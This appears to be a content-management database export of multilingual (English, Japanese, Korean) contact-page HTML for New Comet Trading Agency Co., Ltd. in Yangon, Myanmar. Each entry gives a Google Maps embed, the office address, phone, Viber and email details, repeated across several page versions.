('page', 0, 11, 234, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 234, 'ko', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2호, 2 층, 방번호201, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing) 어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마&nbsp;<br>전화번호: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 235, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 235, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 235, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2호, 2 층, 방번호201, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing) 어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마&nbsp;<br>전화번호: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 244, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 244, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 244, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 245, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 245, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 245, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 246, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 246, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 246, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 5556677&nbsp;, 09 775556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 247, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 247, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 247, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 260, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 260, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 260, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 261, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 261, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
